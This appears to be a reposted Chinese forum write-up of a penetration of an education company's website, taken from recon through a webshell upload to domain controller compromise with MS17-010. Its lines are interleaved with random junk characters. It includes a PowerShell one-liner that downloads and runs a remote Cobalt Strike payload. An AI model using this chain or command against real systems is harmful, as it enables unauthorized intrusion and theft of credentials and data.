|
2 i! ^- O& |% l1 t2 b
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
. `" u* _* q" @( X 4 ]( m" W; L# @, N( j5 C
* ~+ k2 E1 E' j1 R9 s
* H+ n# s( p8 u8 w( y 9 m7 @* u! H" O5 H! J/ I: U8 P% H: R
" B+ g+ ]: C7 Z5 b9 K- W- v9 a 正文
; K7 d. M( g1 }! n8 \3 o
4 {4 z! a( _) U7 K
3 |1 K& B1 g4 p; o {5 g+ R* |
$ _/ W- g. K$ Q+ e2 e0 L: \ & g' @& f% I& u" f0 S" O3 l' U( |2 ]& X
9 }& `; K0 f# A 目标:www.xxxx.com(一家教育机构)
- q; p: w& ?2 C
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 M! _2 b7 I0 I r3 z( y' B# `
) P5 e) o" {4 G. h; j0 O
; X7 b P8 B0 M 
+ {6 P! Q* Z% s' f2 n% t H6 w
5 e4 s7 ?) Q7 z6 v T$ T% ~! d
$ Z$ ]! J& w$ a2 ?2 T 进行了简单的信息搜集
' i! [% V5 l; m
/ s& ^4 N5 I% j
6 I X5 h! |" ]3 |1 |, b" x
: R! Q8 v# n3 A7 S/ @4 \
3 v' S8 ]% }3 [. R! C% \& h 子域名搜集% k7 M0 W# B. A! T( a5 n6 O% x# b
$ j1 u" N+ O* q1 w, @: j6 }. |3 h0 X5 k5 C* I. @; g! l* g
 7 v, ` [1 q3 |3 [! Z
! Q; D9 d: L/ F, ^6 ]: O$ O5 ]; C) w' z+ \- i; K* Q3 M7 G
fofa找资产
; z* V# H; V- \% D
' C8 J, x8 A& R8 \
) |( I0 ?4 _# u: n6 @# R2 I
' m; ?6 S% n4 ]& Y
! w- w6 N9 a0 E# I/ t. r
 / m T2 k9 c/ o) c7 ]# R7 X9 i5 s
9 G: U. Y+ t; ~, i9 D
5 w, X2 D0 [! B' p% E3 l 一共七个资产。去重之后只有两个。
& _: D" M- Y* l% h5 N. R3 I
: X* I7 w& r- b( X9 T8 d6 H
' _% S+ m8 P4 y6 ^; N9 o6 x E" Y0 y6 p8 y/ o
g( H g) B7 s3 ?: a9 c 目录探测
' n1 N* B4 z5 m- S , Y8 p0 \# K* D/ K, f0 }7 s
$ _, R% w2 V2 M. P  5 b$ j: J' ~& ]( O' `: q( ?2 |
3 t5 L' W( |0 \% F# h
( |1 ]: I& a$ e% l* ^! Z" k 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' f0 }8 c$ r2 e
9 m- i z9 n; @, G/ R5 O; m, C3 X
, z1 @& m; a4 P- _# i
+ t4 P- [+ o) X: Q. J
4 }/ Q8 X$ P* p; z0 Q& K* ^4 A
我又尝试了通过修改返回包来绕过登录界面
2 }, U$ y0 X. C# M. D & l5 y9 I2 w. w( O+ e/ ^, {( t
S3 Y" W2 I3 L- ?% B Y
 0 R/ ?3 S6 V( U$ H
) Q; A0 `$ P4 F" Z, ~
j/ R* }% _& |, P 还是不行,尝试注入无果
# G/ H% N5 o6 A2 b: [
+ g9 p% e* k- w" Y7 N7 w/ X4 h! e1 l) A' u8 a$ W5 |6 S# \
 # u, H$ \9 z# S0 J: `1 p# X
8 A& }0 Q) h" ?/ L$ j. ^% h3 d2 ?" N2 |* ]6 i6 X9 g [' \
不过我目录探测出了一处Spring信息泄露
9 s/ n' A1 i5 `0 Q1 E5 F
& j; B+ d& u7 J9 R" f' V
" `# B4 F* a( a! g% H# t$ S+ Y 1 Z7 ^, s, ]2 {! s
1 }# E# z: {, ?% y- \" [
 # Y! i' V# _4 C& |3 ?5 S& \
$ d: B# \ t8 R8 V
# Y2 `! t/ b0 b) w' W/ c: ^, p
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, N, q1 G; |" \$ K6 W
% a5 Z# f6 O! q" ]0 f4 s- v) Q
" e4 y' z6 T# p/ U0 |# x( [+ B  8 r4 K) v3 |/ H4 z9 N: P! D+ ^& f
+ |$ y3 h9 c# r' C
# P8 E, I) T" \' { 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
[( M' m3 @: D
4 a( N2 g( I; \; b) L: {$ U# x9 ~
. L6 |5 Q" Y/ z+ h  4 Y- C$ @6 k" O' c# P
5 b9 F0 P* K' Z4 \4 P' n/ A N) P3 C0 p/ w4 H: B/ h' x
获取有些师傅到这一步就手机抓包电脑测了。! v y+ f2 M0 @' e0 u
7 s: e# ~5 u7 q3 M& V* y" F0 e6 Q# B4 Z
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
( n9 [# U! V: L) s' m4 L0 C
- H/ q4 F _! S
' k) ?# k9 E9 R4 G 其中在一个公众号发现了小程序,可以进行注册。
5 K1 z2 i( ?) |! d: q 3 Y. J' |+ E1 k% T3 y/ s( c; o
2 R6 O+ g! t! t2 L8 ~' G2 j
看到了头像上传,尝试上传获取WebShell
) D' P) ^1 D5 a. l- a4 c! o* W" P( x 1 }3 b3 s% C# k. p8 F2 g
0 {3 G9 S4 T5 S {$ C Z5 B  ) T8 i( j) H3 _$ p
- j D! y- L! p9 B& E0 T
# T9 _& X+ c& C; `1 ]
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
% m' p* m, E- I$ u3 J/ B- ~
3 u& ?7 z# r( r; p b& Q
4 p0 H! {+ y# C/ n$ h! @/ N 
0 ?- ?7 G9 k* i
6 c# `4 A8 M3 J2 S$ L y5 _8 }5 {( I) I# a# u* @% V" U1 X. J
然后上了大马$ F" X+ D5 x0 p3 y+ e& U. o! ^: w
/ v' r: @+ d; K; a5 o1 M. Z6 o( w- }& V! H8 x
% a% k3 q! X7 Z" ~& i- t8 e ; K) `; h2 h/ r/ d
, C$ F7 d T, Z" G7 C( t9 \; y 
9 j: F, }+ S+ f2 F4 O1 k B* r" v7 W$ I+ L) c4 e! m; p
* |" Z- ^" W# b. p; m
通过翻找文件发现数据库账号密码
4 }' t/ Y2 [) N& |# C ^& ~
. H% O( n! J0 H/ @( l- W( U4 d
' N8 S" t2 q. f ]+ n. j  . t9 [' b5 ], h0 z' F( ]; M
5 v$ r+ ^5 j" h; X
, d0 `" J; c( Q% Z --内网渗透
* p0 Z8 ], K! C. P2 b : y6 q# t/ P8 g5 r2 T5 u0 D' B8 B
; c: u- V. v8 V8 z8 o# [) R: n 直接通过powershell执行 cs上线& g/ l# R; j2 v9 x# ?9 W* j8 P1 V
! c# K& ~5 p1 }# K1 \+ y/ l7 {2 Z. L( U+ L1 K2 q
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
; v1 [1 p! Z% H* F. C; M' ~# X 3 G- r$ ^$ H7 y5 |+ Q
1 {# W( F' q0 x g, T
 ) r$ P, D& }& `9 E5 G$ Y% ^; Z
7 o) \4 O8 c) \$ C* c) j
, S0 y! i% U$ u& E; { 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
1 J5 c% D! s9 D- S+ e Q 3 G% V, [; v2 M( I* h) o5 q
2 O4 o! I2 G. a5 k+ t 
* f' q& G7 }) H8 A# }6 G7 j 8 D7 `: b' x5 }; V M
; C% s" P; ]$ d$ M
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ o5 D$ a. Y9 S$ u
4 f" e9 p1 ]+ x" P( B+ I$ W/ i. E g
. b5 S V+ R/ v" y
; r$ L! M" \1 G( o% |
4 N& w+ M8 i, }6 J% ?
: b( E0 C7 Y/ ]& [1 `  5 a7 O( n9 {' K, S V/ t! G
2 E. @& X8 ]& R" P3 A9 p0 ?
9 T* O1 C/ k! i8 D. c 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, A) W: y( Q6 M' @# `: {& J
: p7 @$ l) C2 `" y7 N" T
, |0 w5 r2 q8 u. Q
2 S; ]8 m5 V5 L$ L! i
0 I3 e- Q( z I
8 S( k% Q e7 J4 m% V0 c 3 f# w# c6 v2 L: g/ W
/ B3 m) b0 O. u, L6 a/ ^& E& k& U
+ |/ ]" |% `% Z% ~" @! ?
2 K* B- A+ }$ C+ n# `& f0 o) l1 Y4 I
9 n" }& c3 P7 h$ E/ A
* }4 m# G C/ G) Y' e4 F3 H9 L- U! a: ] _+ ~' J; h
5 B7 ?2 b7 ] S$ S+ e; X
/ p8 E0 j' F- [1 U
- l j9 {* H7 J& S1 }$ c 小结
( Y) S4 x) N$ n5 D- a ' j' r! Z. P d2 v# }8 C
8 j8 }4 g) `; F2 I- V4 v: K( Z
J8 U" j& q' U4 G6 E4 i$ U8 o2 Q
7 X F5 U' z& o* X9 d; j
1 S3 @- u" H4 e, K& x. E 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 u5 Q0 `( |# a5 Z/ D' ?1 w
6 T; x: M2 d4 r8 t J/ w1 W
+ J& L4 s W. v+ Y0 c * A, l3 z6 f& K; I4 |
2 {' m* p" [2 s4 b9 n7 |+ n7 v! E2 \0 e& O) A5 a9 ]
-
3 S; R" M( B( w+ f, X ~1 K( y. p
8 R/ t1 U; W: d
- p' I1 b6 q& \" G -
% z8 m1 i1 ]$ I7 r7 G2 K& J
7 ?2 U+ l2 r; [" i
; `. Z! o& ]. ]1 e5 B
- m, S0 w' ~3 m1 K! j
" L9 O: L4 D" G* Y7 x. p9 \
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html. s) O# Q J: U" S# i% i
9 {1 ` J! b+ p& X a
9 S' A- Z @# J7 }$ B+ A* _
, i1 x. P2 X% H | 
发表于 2024-3-1 19:41:32
收藏
支持
反对